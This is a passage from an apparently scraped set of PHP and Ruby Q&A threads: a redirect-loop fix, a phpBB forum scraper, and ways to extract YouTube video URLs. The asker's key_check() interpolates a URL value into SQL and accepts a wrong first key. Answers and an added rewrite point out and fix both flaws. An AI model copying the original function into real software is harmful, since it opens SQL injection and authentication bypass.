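    if ($fh === false) {
        return false;
    }
    try {
        if (!flock($fh, LOCK_EX)) { // concurrent clicks queue up here
            return false;
        }
        $last = (int) trim((string) stream_get_contents($fh));
        if ($now - $last < $cooldown) {
            return false; // somebody already notified inside the window
        }
        if (!$send()) {
            return false; // mail failed: do not start the cooldown
        }
        // Record the send time while the lock is still held.
        ftruncate($fh, 0);
        rewind($fh);
        fwrite($fh, (string) $now);
        fflush($fh);
        return true;
    } finally {
        flock($fh, LOCK_UN);
        fclose($fh);
    }
}

if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $subject = is_string($_POST['subject'] ?? null) ? clean_subject($_POST['subject']) : '';
    $message = is_string($_POST['message'] ?? null) ? trim($_POST['message']) : '';

    if ($subject === '' || $message === '') {
        http_response_code(400);
        echo 'Subject and message are required.';
    } elseif (notify_once_per_window(
        STATE_FILE,
        time(),
        COOLDOWN,
        fn () => mail(NOTIFY_TO, $subject, $message)
    )) {
        echo 'Notification sent.';
    } else {
        http_response_code(429);
        echo 'A notification was already sent within the last hour.';
    }
}
```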

header() not working in php when the url contains parameters? [closed]

So I'm using $_GET to capture the URL to use it later but when I use $_GET it won't redirect!
So here's my sample code:
URL : http://localhost/project/active.php/?s=ieugfshd&h=qwuyrbcq&i=1
php code:
<?php
include 'init.php';
$s = trim($_GET['s']);
$h = trim($_GET['h']);
$i = trim($_GET['i']);
$q = key_check($s,$h,$i);
if($q == 1)
{
header("location:password_active.php");
exit;
}
if($q == 0)
{
header("location:login_failed.php");
exit;
}
?>
EDIT:
key_check( ) function
function key_check($k1,$k2,$id)
{
$query = mysql_query("select key1 from users where user_id = '$id'");
$key1 =mysql_result($query,0);
$query = mysql_query("select key2 from users where user_id = '$id'");
$key2 =mysql_result($query,0);
$y=strcmp($k1,$key1);
$z=strcmp($k2,$key2);
if($y || $z == 0)
{
return 1;
}
else
{
return 0;
}
}
Now when I try this, I got "1" but I'm getting
This web page has a redirect loop
But my password_active.php doesn't have any redirects. It's just an html page.
The URL you're using to access to your script is:
http://localhost/project/active.php/?s=ieugfshd&h=qwuyrbcq&i=1
This loads active.php, which does its role and then tries to send the following header :
header("location:password_active.php");
The browser receives this header, and tries to resolve that relative URL by adding password_active.php after the last slash before the query string (that ?s=xxx string).
So your browser loads:
http://localhost/project/active.php/password_active.php?s=ieugfshd&h=qwuyrbcq&i=1
This loads active.php again, which does its role again and then sends the same header again, and that loads this page:
http://localhost/project/active.php/password_active.php?s=ieugfshd&h=qwuyrbcq&i=1
Again. And again. And again. After several tries, your browser understands that something is going wrong and stops.
You should use an absolute URL in your HTTP header:
header("Location: /project/password_active.php");
Also, please note how HTTP headers should be written, according to the standard.
Random notes :
According to the file names, $s and $h are both passwords. You should hash them, and not pass them via the URL.
if($y || $z == 0) is unlikely to work as you think, since it will be evaluated as if y or not z in pseudo code, while you may have wanted if not y and not z for password checking.
Also, good point for calling exit() after a Location header. You should never forget that, as it is very important and may cause some trouble in your scripts if you forget them.
Try removing / after file.php. Like index.php?i=sa
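The notes in the first answer applied to the question's key_check(), as an added example that is not the poster's code: a parameterised query replaces the interpolated $id, both keys must match (the original if($y || $z == 0) returns 1 whenever the first key is wrong or the second is right), and the redirect target is an absolute path. The PDO handle, activation_target() and the login_failed.php path are assumptions; the demo row is constructed from the sample URL.

```php
<?php
// Added example, not the poster's code. Table and column names follow the
// question; the PDO connection and the helper names are assumptions.

/** True only when BOTH keys match the stored values for this user id. */
function key_check(PDO $db, string $k1, string $k2, string $id): bool
{
    if (!ctype_digit($id)) {
        return false; // user_id is expected to be a plain number
    }
    // Bound parameter: the value from the URL never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT key1, key2 FROM users WHERE user_id = :id');
    $stmt->execute([':id' => (int) $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;
    }
    // hash_equals() compares in constant time; evaluate both before combining.
    $ok1 = hash_equals((string) $row['key1'], $k1);
    $ok2 = hash_equals((string) $row['key2'], $k2);
    return $ok1 && $ok2;
}

/** Choose the redirect target; absolute paths avoid the loop described above. */
function activation_target(PDO $db, array $query): string
{
    $get = fn (string $name): string =>
        is_string($query[$name] ?? null) ? trim($query[$name]) : '';

    return key_check($db, $get('s'), $get('h'), $get('i'))
        ? '/project/password_active.php'
        : '/project/login_failed.php'; // assumed path, by analogy with the answer
}

// In active.php this would be used as:
//     header('Location: ' . activation_target($db, $_GET));
//     exit;

if (PHP_SAPI === 'cli') {
    // Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, key1 TEXT, key2 TEXT)');
    $db->exec("INSERT INTO users VALUES (1, 'ieugfshd', 'qwuyrbcq')");

    $cases = [
        'both keys right'  => ['s' => 'ieugfshd', 'h' => 'qwuyrbcq', 'i' => '1'],
        'first key wrong'  => ['s' => 'wrong',    'h' => 'qwuyrbcq', 'i' => '1'],
        'second key wrong' => ['s' => 'ieugfshd', 'h' => 'wrong',    'i' => '1'],
        'non-numeric id'   => ['s' => 'ieugfshd', 'h' => 'qwuyrbcq', 'i' => 'abc'],
    ];
    foreach ($cases as $label => $query) {
        echo str_pad($label, 18), activation_target($db, $query), PHP_EOL;
    }
}
```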

How to download all posts of phpBB3 forum if I am not admin? [closed]

I am used to posting my ideas on one forum and started to worry that I will lose them if it gets closed. Do you know a good way to download an entire (ideas of other guys are also nice!) phpBB3 forum to a database? Is there software already available, or do I have to write it myself?
UPDATE1:
Well, I can write it myself - this is not that hard a problem, is it? I just don't want to waste time on inventing a bicycle.
UPDATE2:
There is an answer at SuperUser: How can I download an entire (active) phpbb forum?
But I preferred to make a Ruby script for backing up the forum. It is not a complete solution, but it is enough for me. And yes, it doesn't violate any TOS if you are so worried.
require 'rubygems'
require 'hpricot'
require 'open-uri'
require 'uri'
require 'cgi'
#require 'sqlite3-ruby'
class PHPBB
  def initialize base_url
    @base_url = base_url
    @forums, @topics = Array.new(4) { {} }
    self.parse_main_page 'main', 'index.php'
    @forums.keys.each do |f|
      self.parse_forum "forum.#{f}", "viewforum.php?f=#{f}"
    end
    @topics.keys.each do |t|
      self.parse_topic "topic.#{t}", "viewtopic.php?t=#{t}"
    end
  end

  # Return the page from the local cache, downloading it first if needed.
  def read_file cached, remote
    local = "%s.%s.html" % [__FILE__, cached]
    if File.exist? local
      return IO.read local
    else # download and save
      puts "load #{remote}"
      File.new(local, "w+") << (content = URI.open(@base_url + remote).read)
      return content
    end
  end

  def parse_main_page local, remote
    doc = Hpricot(self.read_file(local,remote))
    doc.search('ul.forums/li.row').each do |li|
      fa = li.search('a.forumtitle').first # forum anchor
      f = self.parse_anchor(fa)['f']
      @forums[f] = {
        forum_id: f,
        title: fa.inner_html,
        description: li.search('dl/dt').first.inner_html.split('<br />').last.strip
      }
      ua, pa = li.search('dd.lastpost/span/a') # user anchor, post anchor
      q = self.parse_anchor(pa)
      self.last_post f, q['p'] unless q.nil?
    end
  end

  # Remember the newest post id seen so far.
  def last_post f,p
    @last_post = {forum_id: f, post_id: p} if @last_post.nil? or p.to_i > @last_post[:post_id].to_i
  end

  def last_topic f,t
  end

  def parse_forum local, remote, start=nil
    doc = Hpricot(self.read_file(local,remote))
    doc.search('ul.topics/li.row').each do |li|
      ta = li.search('a.topictitle').first # topic anchor
      q = self.parse_anchor(ta)
      f = q['f']
      t = q['t']
      u = self.parse_anchor(li.search('dl/dt/a').last)['u']
      @topics[t] = {
        forum_id: f,
        topic_id: t,
        user_id: u,
        title: ta.inner_html
      }
    end
  end

  def parse_topic local, remote, start=nil
    doc = Hpricot(self.read_file(local,remote))
    if start.nil?
      # Follow the pagination links once, from the first page only.
      doc.search('div.pagination/span/a').collect{ |p| self.parse_anchor(p)['start'] }.uniq.each do |p|
        self.parse_topic "#{local}.start.#{p}", "#{remote}&start=#{p}", true
      end
    end
    doc.search('div.postbody').each do |li|
      # do something
    end
  end

  # Turn the query string of a link into a hash of single values.
  def parse_url href
    r = CGI.parse URI.parse(href).query
    r.each_pair { |k,v| r[k] = v.last }
  end

  def parse_anchor hp
    self.parse_url hp.attributes['href'] unless hp.nil?
  end
end
This will be a violation of Terms of Service and may be illegal too.
Secondly, if the StackOverflow community starts solving these kinds of web-scraping problems, then you know ...

Downloading Youtube videos with PHP [closed]

I am searching for a way to download Youtube videos using PHP. I have searched how to do this for hours but unfortunately all the Google results I find are years old and do not work anymore.
I would appreciate it if someone could explain how to do this, or give a link to an up-to-date article that explains it in detail.
Thanks very much.
The first thing you should do is get a tool like Fiddler and visit a YouTube video page. In Fiddler, you will see all of the files that make up that page, including the FLV itself. Now, you know that the video isn't one of the CSS files, nor is it the image files. You can ignore those. Look for a big file. If you look at the URL, it begins with /videoplayback.
Now, once you've found it, figure out how the browser knew to get that file. Do a search through the sessions (Ctrl+F) and look for "videoplayback". You will see a hit on the first page you went to, like http://www.youtube.com/watch?v=123asdf. If you dig through that file, you'll see a DIV tag with the ID of "watch-player". Within that there is a script tag to set up the flash player, and within that are all of the flash parameters. Within those is the URL to the video.
So now you know how to use your tools to figure out how the browser got to it. How do you duplicate this behavior in PHP?
Do a file_get_contents() on the page that references the video. Ignore everything not in that watch-player div. Parse through the code until you find that variable that contains the URL. From there you will probably have to unescape that URL. Once you have it, you can do a file_get_contents() (or some other download method, depending on what you are trying to do) to get the URL. It is that simple. Your HTML parsing code will be the most complex.
Finally, keep in mind what you are about to do may be illegal. Check the EULA.
Nobody writes manuals/howtos that become outdated every four weeks. The closest you can get is inspecting the actual extraction methods in a contemporary implementation. Quite readable:
http://bitbucket.org/rg3/youtube-dl/raw/2010.08.04/youtube-dl
If you don't want to read through/reimplement it, it's obviously not simple, you could just run it as-is from PHP:
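// escapeshellarg() quotes $url so that its contents cannot run as shell commands.
system('youtube-dl ' . escapeshellarg($url));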
Last time I was working on fixing one of the broken Chrome extensions to download YouTube video. I fixed it by altering the script part. (Javascript)
var links = new String();
var downlink = new String();
var has22 = new Boolean();
has22 = false;
var Marked=false;
var FMT_DATA = fmt_url_map;//This is html text that you have to grab. In case of extension it was readily available through:document.getElementsByTagName('script');
var StrSplitter1='%2C', StrSplitter2='%26', StrSplitter3='%3D';
if (FMT_DATA.indexOf(',')>-1) { //Found ,
StrSplitter1=',';
StrSplitter2=(FMT_DATA.indexOf('&')>-1)?'&':'\\u0026';
StrSplitter3='=';
}
var videoURL=new Array();
var FMT_DATA_PACKET=new Array();
var FMT_DATA_PACKET=FMT_DATA.split(StrSplitter1);
for (var i=0;i<FMT_DATA_PACKET.length;i++){
var FMT_DATA_FRAME=FMT_DATA_PACKET[i].split(StrSplitter2);
var FMT_DATA_DUEO=new Array();
for (var j=0;j<FMT_DATA_FRAME.length;j++){
var pair=FMT_DATA_FRAME[j].split(StrSplitter3);
if (pair.length==2) {
FMT_DATA_DUEO[pair[0]]=pair[1];
}
}
var url=(FMT_DATA_DUEO['url'])?FMT_DATA_DUEO['url']:null;
if (url==null) continue;
url=unescape(unescape(url)).replace(/\\\//g,'/').replace(/\\u0026/g,'&');
var itag=(FMT_DATA_DUEO['itag'])?FMT_DATA_DUEO['itag']:null;
if (itag==null) continue;
var signature=(FMT_DATA_DUEO['sig'])?FMT_DATA_DUEO['sig']:null;
if (signature!=null) {
url=url+"&signature="+signature;
}
if (url.toLowerCase().indexOf('http')==0) { // validate URL
if (itag == '5') {
links += '<span class="yt-uix-button-menu-item" id="v240p">FLV (240p)</span>';
}
if (itag == '18') {
links += '<span class="yt-uix-button-menu-item" id="v360p">MP4 (360p)</span>';
}
if (itag == '35') {
links += '<span class="yt-uix-button-menu-item" id="v480p">FLV (480p)</span>';
}
if (itag == '22') {
links += '<span class="yt-uix-button-menu-item" id="v720p">MP4 HD (720p)</span>';
}
if (itag == '37') {
links += ' <span class="yt-uix-button-menu-item" id="v1080p">MP4 HD (1080p)</span>';
}
if (itag == '38') {
links += '<span class="yt-uix-button-menu-item" id="v4k">MP4 HD (4K)</span>';
}
FavVideo();
videoURL[itag]=url;
console.log(itag);
}
}
You can get a separate video link from the videoURL[itag] array.
The above logic can be converted to PHP easily.
The extension can be downloaded from location http://www.figmentsol.com/chrome/ytdw/
I hope this would help someone. This is a working solution (date:06-04-2013)
